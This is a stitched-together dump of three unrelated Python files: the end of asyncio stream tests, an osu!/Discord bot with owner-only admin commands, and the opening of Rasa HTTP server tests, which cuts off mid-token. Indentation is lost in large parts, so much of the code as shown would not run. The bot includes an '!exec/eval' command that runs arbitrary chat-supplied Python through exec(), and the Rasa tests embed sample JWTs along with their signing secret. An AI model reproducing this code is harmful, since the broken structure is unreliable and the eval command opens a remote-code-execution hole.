stream._waiter = None
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__transport(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<StreamReader transport=<Transport>>", repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
def test_async_writer_api(self):
async def inner(httpd):
rd, wr = await asyncio.open_connection(*httpd.address)
wr.write(b'GET / HTTP/1.0\r\n\r\n')
data = await rd.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await rd.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
wr.close()
await wr.wait_closed()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_async_writer_api_exception_after_close(self):
async def inner(httpd):
rd, wr = await asyncio.open_connection(*httpd.address)
wr.write(b'GET / HTTP/1.0\r\n\r\n')
data = await rd.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await rd.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
wr.close()
with self.assertRaises(ConnectionResetError):
wr.write(b'data')
await wr.drain()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_eof_feed_when_closing_writer(self):
    # See http://bugs.python.org/issue35065
    # Closing the writer must feed EOF to the paired reader.
    messages = []
    self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))

    with test_utils.run_test_server() as httpd:
        rd, wr = self.loop.run_until_complete(
            asyncio.open_connection(*httpd.address))

        wr.close()
        f = wr.wait_closed()
        self.loop.run_until_complete(f)
        # Use unittest assertions for consistency with the rest of this
        # file; bare `assert` is also stripped when running under -O.
        self.assertTrue(rd.at_eof())
        f = rd.read()
        data = self.loop.run_until_complete(f)
        self.assertEqual(data, b'')

    self.assertEqual(messages, [])
if __name__ == '__main__':
unittest.main()
|
bot.py | import discord, os, asyncio, pyosu, textwrap, osu_irc, re
from discord.ext import commands
from helpers.config import config
from helpers.parse import parse_args
from helpers.classify import Classify
from helpers.command import parse_commands, init_commands
from helpers.db import ban_user, get_bugs, get_suggestions, get_users, unban_user, connect_db, log_command, set_last_beatmap, add_user, remove_user, get_banned, get_logs
from helpers.np import pp, process_re
from contextlib import redirect_stdout
from io import StringIO
import multiprocessing as mp
enabled = True
path = os.path.dirname(os.path.realpath(__file__))
api = pyosu.OsuApi(config["osuapikey"])
bot = commands.Bot(command_prefix="!")
@bot.command()
@commands.is_owner()
async def ban(ctx: commands.Context, username, reason=""):
user = await api.get_user(username)
await ban_user(username, user.user_id, reason)
await ctx.send("Banned user!")
@bot.command()
@commands.is_owner()
async def unban(ctx: commands.Context, username):
await unban_user(username)
await ctx.send("Unbanned user!")
@bot.command()
@commands.is_owner()
async def unban_id(ctx: commands.Context, user_id):
await unban_user(None, user_id)
await ctx.send("Unbanned user!")
@bot.command()
@commands.is_owner()
async def bugs(ctx: commands.Context):
result = await get_bugs()
await ctx.send(f"```{result}```")
@bot.command()
@commands.is_owner()
async def suggestions(ctx: commands.Context):
result = await get_suggestions()
await ctx.send(f"```{result}```")
@bot.command()
@commands.is_owner()
async def users(ctx: commands.Context):
users = await get_users()
await ctx.send(f"```{users}```")
@bot.command(name="exec", aliases=["eval"])
@commands.is_owner()
async def _exec(ctx, *, body: str):
    """Owner-only: execute arbitrary Python code and report stdout / return value.

    SECURITY: this deliberately runs arbitrary code through exec(); it is
    only tolerable because commands.is_owner() restricts it to the bot owner.
    """
    env = {
        "bot": bot,
        "ctx": ctx,
        "channel": ctx.channel,
        "author": ctx.author,
        "guild": ctx.guild,
        "message": ctx.message,
        "discord": discord
    }

    # Strip the Markdown code fence, then indent the body into a coroutine.
    body = textwrap.indent(body.replace("```py", "").strip("`"), 4 * ' ')
    to_compile = f"async def func():\n{body}"

    loc = {}
    stdout = StringIO()
    try:
        with redirect_stdout(stdout):
            exec(to_compile, env, loc)
            # BUG FIX: the original ran `asyncio.run(func())`, which raises
            # RuntimeError inside the bot's already-running event loop.
            # Awaiting the compiled coroutine directly is the correct way.
            result = await loc["func"]()
    except Exception as e:
        await ctx.message.add_reaction("❌")
        return await ctx.send(f"```\n{e.__class__.__name__}: {e}\n```")
    else:
        await ctx.message.add_reaction("✅")
        output = stdout.getvalue()[:-1]
        if output:
            await ctx.send(f"stdout \n```\n{output}\n```")
        if result:
            await ctx.send(f"return value \n```\n{result}\n```")
async def onMessage(msg: osu_irc.Message):
    """Dispatch one incoming osu! IRC private message.

    Handles three cases: BanchoBot replies (records the id of a freshly
    created tournament match), registered bot commands, and "/np"-style
    "is playing/listening/editing/watching ..." messages (computes pp).
    Returns the reply text to send back, or None when nothing applies.

    NOTE(review): indentation was reconstructed from a flattened dump;
    confirm the trailing "is " branch really nests under `msg.is_private`.
    """
    # NOTE(review): `banned` is fetched but never consulted below —
    # dead code or a missing ban check? Verify intent.
    banned = await get_banned(msg.user_name)
    if msg.is_private:
        args = parse_args(msg.content)
        user = await api.get_user(msg.user_name)
        if msg.user_name == "BanchoBot":
            if msg.content.startswith("You cannot create any more"):
                return
            # Remember the id of the tournament lobby BanchoBot just created.
            global recent_mp_id
            mp_id = int(re.findall(r"Created the tournament match https:\/\/osu\.ppy\.sh\/mp\/([0-9]+)", msg.content)[0])
            recent_mp_id = mp_id
            return
        ctx = Classify({ # context object to send to command
            "message": msg, # message object
            "msg": msg, # alias to message
            "username": msg.user_name,
            "content": msg.content, # raw message contents (not parsed)
            "userid": user.user_id,
            "match": None
        })
        responce = await parse_commands(args, ctx)
        if responce: # only send if command detected
            async def send_msg():
                await add_user(msg.user_name, user.user_id, msg.content) # add user to db
                await log_command(msg.user_name, user.user_id, msg.content) # log the message
                print(f"TEST Sent {msg.user_name} this \"{responce}\"")
                return str(responce)
            r = await send_msg()
            return r
        if msg.content.startswith("is "):
            user = await api.get_user(msg.user_name)
            print(f"Got /np from {msg.user_name} which contains this \"{msg.content}\"")
            await log_command(msg.user_name, user.user_id, msg.content)
            # get /np
            await add_user(msg.user_name, user.user_id, msg.content)
            # Match "is playing/listening to/editing/watching [<beatmap url> ...]".
            all = re.findall(r"is playing \[https:\/\/osu\.ppy\.sh\/beatmapsets\/[0-9]+\#(.*)\/([0-9]+) .*\]( .*|)|is listening to \[https:\/\/osu\.ppy\.sh\/beatmapsets\/[0-9]+\#(.*)\/([0-9]+) .*\]|is editing \[https:\/\/osu\.ppy\.sh\/beatmapsets\/[0-9]+\#(.*)\/([0-9]+) .*\]|is watching \[https:\/\/osu\.ppy\.sh\/beatmapsets\/[0-9]+\#(.*)\/([0-9]+) .*\]( .*|)",
                str(msg.content))
            mods, map_id = process_re(all)
            await set_last_beatmap(msg.user_name, map_id)
            mode = await api.get_beatmap(beatmap_id=map_id)
            result = await pp(map_id, mods, mode.mode)
            # NOTE(review): this returns only the FIRST line of `result`;
            # a multi-line send looks intended — confirm against callers.
            for r in result.split("\n"):
                return r
@bot.command()
@commands.is_owner()
async def msg(ctx: commands.Context, user: str, *, msg: str):
try: message = osu_irc.Message(msg)
except AttributeError: message = osu_irc.Message(" ".join(msg)); err = True
else: err = False
message._user_name = user
if err:
message._content = " ".join(msg)
else:
message._content = msg
r = await onMessage(message)
await ctx.send(f"```{r}```") # fake message
@bot.command(name="add_user")
@commands.is_owner()
async def _add_user(ctx: commands.Context, username, userid, content=""):
await add_user(username, userid, content)
await ctx.send("User added!")
@bot.command(name="remove_user")
@commands.is_owner()
async def _remove_user(ctx: commands.Context, username):
await remove_user(username)
await ctx.send("User removed!")
@bot.command(name="remove_user_id")
@commands.is_owner()
async def _remove_user_id(ctx: commands.Context, userid):
await remove_user(user_id=userid)
await ctx.send("User removed!")
@bot.command(name="logs")
@commands.is_owner()
async def _logs(ctx: commands.Context):
logs = await get_logs()
await ctx.send("```" + str(logs) + "```")
def start_bot():
    """Blocking entry point for the bot process: connect DB, then run Discord."""
    global pool
    # NOTE(review): asyncio.run() creates its OWN event loop, so the loop
    # obtained from get_event_loop() here is not the one connect_db runs
    # on — verify connect_db merely stores the handle.
    asyncio.run(connect_db(asyncio.get_event_loop()))
    # Re-import so the pool created by connect_db is visible at module level.
    from helpers.db import pool
    bot.run(config["discordbottoken"])
async def init_bot(spookybot):
if not enabled:
return
mp.set_start_method("spawn")
botprocess = mp.Process(target=start_bot)
botprocess.start()
def stop_bot():
    """Request a clean shutdown of the Discord bot.

    BUG FIX: ``bot.logout()`` is a coroutine; the original called it
    without awaiting, which only created (and discarded) the coroutine
    object and never logged out. Schedule it on the bot's event loop,
    which is safe from a foreign thread.

    NOTE(review): init_bot starts the bot in a separate *process*; if this
    is called from the parent process it cannot reach that loop at all and
    the Process itself should be terminated instead — confirm the caller.
    """
    asyncio.run_coroutine_threadsafe(bot.logout(), bot.loop)
test_server.py | import os
from multiprocessing.managers import DictProxy
import requests
import time
import tempfile
import uuid
from typing import List, Text, Type, Generator, NoReturn
from contextlib import ExitStack
from _pytest import pathlib
from aioresponses import aioresponses
import pytest
from freezegun import freeze_time
from mock import MagicMock
from multiprocessing import Process, Manager
import rasa
import rasa.constants
import rasa.utils.io
from rasa.core import events, utils
from rasa.core.agent import Agent
from rasa.core.channels import CollectingOutputChannel, RestInput, SlackInput
from rasa.core.channels.slack import SlackBot
from rasa.core.events import Event, UserUttered, SlotSet, BotUttered
from rasa.core.trackers import DialogueStateTracker
from rasa.model import unpack_model
from rasa.utils.endpoints import EndpointConfig
from sanic import Sanic
from sanic.testing import SanicTestClient
from tests.nlu.utilities import ResponseTest
from tests.conftest import get_test_client
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, "name": "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_without_api)
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_server)
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_nlu_server)
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_core_server)
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_secured)
def test_root(rasa_app: SanicTestClient):
_, response = rasa_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_without_enable_api(rasa_app_without_api: SanicTestClient):
_, response = rasa_app_without_api.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_version(rasa_app: SanicTestClient):
_, response = rasa_app.get("/version")
content = response.json
assert response.status == 200
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
def test_status(rasa_app: SanicTestClient, trained_rasa_model: Text):
_, response = rasa_app.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
def test_status_nlu_only(rasa_app_nlu: SanicTestClient, trained_nlu_model: Text):
_, response = rasa_app_nlu.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert "model_file" in response.json
assert model_file == trained_nlu_model
def test_status_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/status")
assert response.status == 401
def test_status_not_ready_agent(rasa_app: SanicTestClient):
rasa_app.app.agent = None
_, response = rasa_app.get("/status")
assert response.status == 409
@pytest.fixture
def shared_statuses() -> DictProxy:
    # Cross-process dict used to coordinate the mocked training run below.
    return Manager().dict()


@pytest.fixture
def background_server(
    shared_statuses: DictProxy, tmpdir: pathlib.Path
) -> Generator[Process, None, None]:
    """Yield a (not yet started) Rasa server Process whose train() blocks.

    rasa.train is monkeypatched inside the child process to a function that
    sets ``started_training`` and then spins until ``stop_training`` is set,
    so the test can probe /status while "training" is in progress.
    """
    # Create a fake model archive which the mocked train function can return
    from pathlib import Path

    fake_model = Path(tmpdir) / "fake_model.tar.gz"
    fake_model.touch()
    fake_model_path = str(fake_model)

    # Fake training function which blocks until we tell it to stop blocking
    # If we can send a status request while this is blocking, we can be sure that the
    # actual training is also not blocking
    def mocked_training_function(*_, **__) -> Text:
        # Tell the others that we are now blocking
        shared_statuses["started_training"] = True
        # Block until somebody tells us to not block anymore
        while shared_statuses.get("stop_training") is not True:
            time.sleep(1)
        return fake_model_path

    def run_server() -> NoReturn:
        import rasa

        # Patch before the CLI entry point triggers training.
        rasa.train = mocked_training_function

        from rasa import __main__
        import sys

        sys.argv = ["rasa", "run", "--enable-api"]
        __main__.main()

    server = Process(target=run_server)
    yield server
    # Fixture teardown: make sure the child process does not outlive the test.
    server.terminate()
@pytest.fixture()
def training_request(shared_statuses: DictProxy) -> Generator[Process, None, None]:
def send_request() -> None:
with ExitStack() as stack:
formbot_data = dict(
domain="examples/formbot/domain.yml",
config="examples/formbot/config.yml",
stories="examples/formbot/data/stories.md",
nlu="examples/formbot/data/nlu.md",
)
payload = {
key: stack.enter_context(open(path)).read()
for key, path in formbot_data.items()
}
payload["force"] = True
response = requests.post("http://localhost:5005/model/train", json=payload)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# Due to unknown reasons this test can not be run in pycharm, it
# results in segfaults...will skip in that case - test will still get run on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
def test_train_status_is_not_blocked_by_training(
    background_server: Process, shared_statuses: DictProxy, training_request: Process
):
    """/status must stay responsive, and count active jobs, during training."""
    background_server.start()

    def is_server_ready() -> bool:
        # Poll until the HTTP API answers; the child process needs startup time.
        try:
            return requests.get("http://localhost:5005/status").status_code == 200
        except Exception:
            return False

    # wait until server is up before sending train request and status test loop
    while not is_server_ready():
        time.sleep(1)

    training_request.start()

    # Wait until the blocking training function was called
    while shared_statuses.get("started_training") is not True:
        time.sleep(1)

    # Check if the number of currently running trainings was incremented
    response = requests.get("http://localhost:5005/status")
    assert response.status_code == 200
    assert response.json()["num_active_training_jobs"] == 1

    # Tell the blocking training function to stop
    shared_statuses["stop_training"] = True
    while shared_statuses.get("training_result") is None:
        time.sleep(1)

    # Check that the training worked correctly
    assert shared_statuses["training_result"] == 200

    # Check if the number of currently running trainings was decremented
    response = requests.get("http://localhost:5005/status")
    assert response.status_code == 200
    assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse(rasa_app, response_test):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
rjs = response.json
assert response.status == 200
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse_with_different_emulation_mode(rasa_app, response_test):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
assert response.status == 200
def test_parse_without_nlu_model(rasa_app_core: SanicTestClient):
_, response = rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == 200
rjs = response.json
assert all(prop in rjs for prop in ["entities", "intent", "text"])
def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicTestClient):
_, response = rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == 400
def test_train_stack_success(
rasa_app,
default_domain_path,
default_stories_file,
default_stack_config,
default_nlu_data,
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
stories_file = stack.enter_context(open(default_stories_file))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=stories_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
assert response.headers["filename"] is not None
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_nlu_success(
rasa_app, default_stack_config, default_nlu_data, default_domain_path
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(), config=config_file.read(), nlu=nlu_file.read()
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_core_success(
    rasa_app, default_stack_config, default_stories_file, default_domain_path
):
    """Core-only training returns a model archive containing a fingerprint."""

    def read(path):
        with open(path) as handle:
            return handle.read()

    payload = {
        "domain": read(default_domain_path),
        "config": read(default_stack_config),
        "stories": read(default_stories_file),
    }
    _, response = rasa_app.post("/model/train", json=payload)
    assert response.status == 200

    # Persist the returned archive and verify it unpacks with a fingerprint.
    workdir = tempfile.mkdtemp()
    archive = os.path.join(workdir, "model.tar.gz")
    with open(archive, "wb") as out:
        out.write(response.body)
    unpacked = unpack_model(archive)
    assert os.path.exists(os.path.join(unpacked, "fingerprint.json"))
def test_train_with_retrieval_events_success(rasa_app, default_stack_config):
    """Training with retrieval-intent data (responses file) also succeeds."""

    def read(path):
        with open(path) as handle:
            return handle.read()

    payload = {
        "domain": read("data/test_domains/default_retrieval_intents.yml"),
        "config": read(default_stack_config),
        "stories": read("data/test_stories/stories_retrieval_intents.md"),
        "responses": read("data/test_responses/default.md"),
        "nlu": read("data/test_nlu/default_retrieval_intents.md"),
    }
    _, response = rasa_app.post("/model/train", json=payload)
    assert response.status == 200

    # Persist the returned archive and verify it unpacks with a fingerprint.
    workdir = tempfile.mkdtemp()
    archive = os.path.join(workdir, "model.tar.gz")
    with open(archive, "wb") as out:
        out.write(response.body)
    unpacked = unpack_model(archive)
    assert os.path.exists(os.path.join(unpacked, "fingerprint.json"))
def test_train_missing_config(rasa_app: SanicTestClient):
    """Training without a config is rejected with HTTP 400."""
    _, response = rasa_app.post(
        "/model/train", json={"domain": "domain data", "config": None}
    )
    assert response.status == 400


def test_train_missing_training_data(rasa_app: SanicTestClient):
    """Training with neither stories nor NLU data is rejected with HTTP 400."""
    _, response = rasa_app.post(
        "/model/train", json={"domain": "domain data", "config": "config data"}
    )
    assert response.status == 400


def test_train_internal_error(rasa_app: SanicTestClient):
    """Unparseable training payloads surface as HTTP 500."""
    _, response = rasa_app.post(
        "/model/train",
        json={"domain": "domain data", "config": "config data", "nlu": "nlu data"},
    )
    assert response.status == 500
def test_evaluate_stories(rasa_app, default_stories_file):
    """Story evaluation reports the expected metric keys (non end-to-end)."""
    stories = rasa.utils.io.read_file(default_stories_file)
    _, response = rasa_app.post("/model/test/stories", data=stories)
    assert response.status == 200

    body = response.json
    expected_keys = {
        "report",
        "precision",
        "f1",
        "accuracy",
        "actions",
        "in_training_data_fraction",
        "is_end_to_end_evaluation",
    }
    assert set(body.keys()) == expected_keys
    assert not body["is_end_to_end_evaluation"]
    assert set(body["actions"][0].keys()) == {
        "action",
        "predicted",
        "confidence",
        "policy",
    }
def test_evaluate_stories_not_ready_agent(
    rasa_app_nlu: SanicTestClient, default_stories_file
):
    """Story evaluation on an NLU-only agent is rejected with HTTP 409."""
    stories = rasa.utils.io.read_file(default_stories_file)
    _, response = rasa_app_nlu.post("/model/test/stories", data=stories)
    assert response.status == 409


def test_evaluate_stories_end_to_end(rasa_app, end_to_end_story_file):
    """e2e=true runs an end-to-end evaluation with the same metric keys."""
    stories = rasa.utils.io.read_file(end_to_end_story_file)
    _, response = rasa_app.post("/model/test/stories?e2e=true", data=stories)
    assert response.status == 200

    body = response.json
    expected_keys = {
        "report",
        "precision",
        "f1",
        "accuracy",
        "actions",
        "in_training_data_fraction",
        "is_end_to_end_evaluation",
    }
    assert set(body.keys()) == expected_keys
    assert body["is_end_to_end_evaluation"]
    assert set(body["actions"][0].keys()) == {
        "action",
        "predicted",
        "confidence",
        "policy",
    }
def test_evaluate_intent(rasa_app, default_nlu_data):
    """Intent evaluation reports intent, entity and response-selection sections."""
    nlu_data = rasa.utils.io.read_file(default_nlu_data)
    _, response = rasa_app.post("/model/test/intents", data=nlu_data)
    assert response.status == 200
    assert set(response.json.keys()) == {
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    }


def test_evaluate_intent_on_just_nlu_model(
    rasa_app_nlu: SanicTestClient, default_nlu_data
):
    """Intent evaluation works the same for an NLU-only model."""
    nlu_data = rasa.utils.io.read_file(default_nlu_data)
    _, response = rasa_app_nlu.post("/model/test/intents", data=nlu_data)
    assert response.status == 200
    assert set(response.json.keys()) == {
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    }
def test_evaluate_intent_with_query_param(
    rasa_app, trained_nlu_model, default_nlu_data
):
    """Evaluating against an explicit model must not swap out the loaded one."""
    _, status_response = rasa_app.get("/status")
    model_before = status_response.json["model_file"]

    nlu_data = rasa.utils.io.read_file(default_nlu_data)
    _, response = rasa_app.post(
        f"/model/test/intents?model={trained_nlu_model}", data=nlu_data
    )
    assert response.status == 200
    assert set(response.json.keys()) == {
        "intent_evaluation",
        "entity_evaluation",
        "response_selection_evaluation",
    }

    # The previously loaded model must still be active afterwards.
    _, status_response = rasa_app.get("/status")
    assert model_before == status_response.json["model_file"]
def test_predict(rasa_app: SanicTestClient):
    """POSTing serialized events to /model/predict yields scores and a tracker."""
    events = [
        {"event": "action", "name": "action_listen"},
        {
            "event": "user",
            "text": "hello",
            "parse_data": {
                "entities": [],
                "intent": {"confidence": 0.57, "name": "greet"},
                "text": "hello",
            },
        },
    ]
    _, response = rasa_app.post(
        "/model/predict",
        json={"Events": {"value": events}},
        headers={"Content-Type": "application/json"},
    )
    assert response.status == 200
    body = response.json
    for key in ("scores", "tracker", "policy"):
        assert key in body
@freeze_time("2018-01-01")
def test_requesting_non_existent_tracker(rasa_app: SanicTestClient):
    """An unknown conversation id yields a freshly initialized tracker."""
    _, response = rasa_app.get("/conversations/madeupid/tracker")
    assert response.status == 200

    tracker = response.json
    assert tracker["paused"] is False
    assert tracker["slots"] == {"name": None}
    assert tracker["sender_id"] == "madeupid"

    frozen_ts = 1514764800  # 2018-01-01 00:00:00 UTC, pinned by freeze_time

    def expected_action(name):
        return {
            "event": "action",
            "name": name,
            "policy": None,
            "confidence": None,
            "timestamp": frozen_ts,
        }

    assert tracker["events"] == [
        expected_action("action_session_start"),
        {"event": "session_started", "timestamp": frozen_ts},
        expected_action("action_listen"),
    ]
    assert tracker["latest_message"] == {
        "text": None,
        "intent": {},
        "entities": [],
        "message_id": None,
        "metadata": {},
    }
@pytest.mark.parametrize("event", test_events)
def test_pushing_event(rasa_app: SanicTestClient, event: Event):
    """A pushed event round-trips through the tracker with a fresh timestamp."""
    sender_id = str(uuid.uuid1())
    events_url = f"/conversations/{sender_id}/tracker/events"

    serialized_event = event.as_dict()
    # Drop the timestamp so the server assigns a new one.
    serialized_event.pop("timestamp")

    time_before_adding_events = time.time()
    _, response = rasa_app.post(
        events_url,
        json=serialized_event,
        headers={"Content-Type": "application/json"},
    )
    assert response.json is not None
    assert response.status == 200

    _, tracker_response = rasa_app.get(f"/conversations/{sender_id}/tracker")
    tracker = tracker_response.json
    assert tracker is not None

    stored_events = tracker.get("events")
    assert len(stored_events) == 1
    deserialised_event = Event.from_parameters(stored_events[0])
    assert deserialised_event == event
    assert deserialised_event.timestamp > time_before_adding_events
def test_push_multiple_events(rasa_app: SanicTestClient):
    """Posting a list of events stores exactly those events on the tracker."""
    conversation_id = str(uuid.uuid1())
    serialized = [e.as_dict() for e in test_events]

    _, response = rasa_app.post(
        f"/conversations/{conversation_id}/tracker/events",
        json=serialized,
        headers={"Content-Type": "application/json"},
    )
    assert response.json is not None
    assert response.status == 200

    _, tracker_response = rasa_app.get(f"/conversations/{conversation_id}/tracker")
    tracker = tracker_response.json
    assert tracker is not None
    # The tracker is asserted to contain exactly the pushed events — no
    # implicit ACTION_LISTEN is prepended by this endpoint.
    assert tracker.get("events") == serialized
def test_put_tracker(rasa_app: SanicTestClient):
    """PUT replaces the tracker's events wholesale."""
    serialized = [event.as_dict() for event in test_events]
    _, response = rasa_app.put(
        "/conversations/pushtracker/tracker/events",
        json=serialized,
        headers={"Content-Type": "application/json"},
    )
    assert response.status == 200
    body = response.json
    assert len(body["events"]) == len(test_events)
    assert body["sender_id"] == "pushtracker"

    _, tracker_response = rasa_app.get("/conversations/pushtracker/tracker")
    tracker = tracker_response.json
    assert tracker is not None
    assert events.deserialise_events(tracker.get("events")) == test_events
def test_sorted_predict(rasa_app: SanicTestClient):
    """Predicted action scores come back sorted by score desc, then name."""
    _create_tracker_for_sender(rasa_app, "sortedpredict")

    _, response = rasa_app.post("/conversations/sortedpredict/predict")
    scores = response.json["scores"]
    assert scores == sorted(
        scores, key=lambda entry: (-entry["score"], entry["action"])
    )


def _create_tracker_for_sender(app: SanicTestClient, sender_id: Text) -> None:
    """Seed a conversation tracker with the first three canned test events."""
    serialized = [event.as_dict() for event in test_events[:3]]
    _, response = app.put(
        f"/conversations/{sender_id}/tracker/events",
        json=serialized,
        headers={"Content-Type": "application/json"},
    )
    assert response.status == 200
def test_get_tracker_with_jwt(rasa_secured_app):
    """Admin JWTs may read any tracker; user JWTs only their own."""

    def bearer(token):
        return {"Authorization": "Bearer " + token}

    # Tokens generated with secret "core" and algorithm HS256 on https://jwt.io/
    # {"user": {"username": "testadmin", "role": "admin"}}
    admin_token = (
        "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
        "eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
        "m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
        "QRre7IWTuIDrCn5AIw"
    )
    # {"user": {"username": "testuser", "role": "user"}}
    user_token = (
        "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
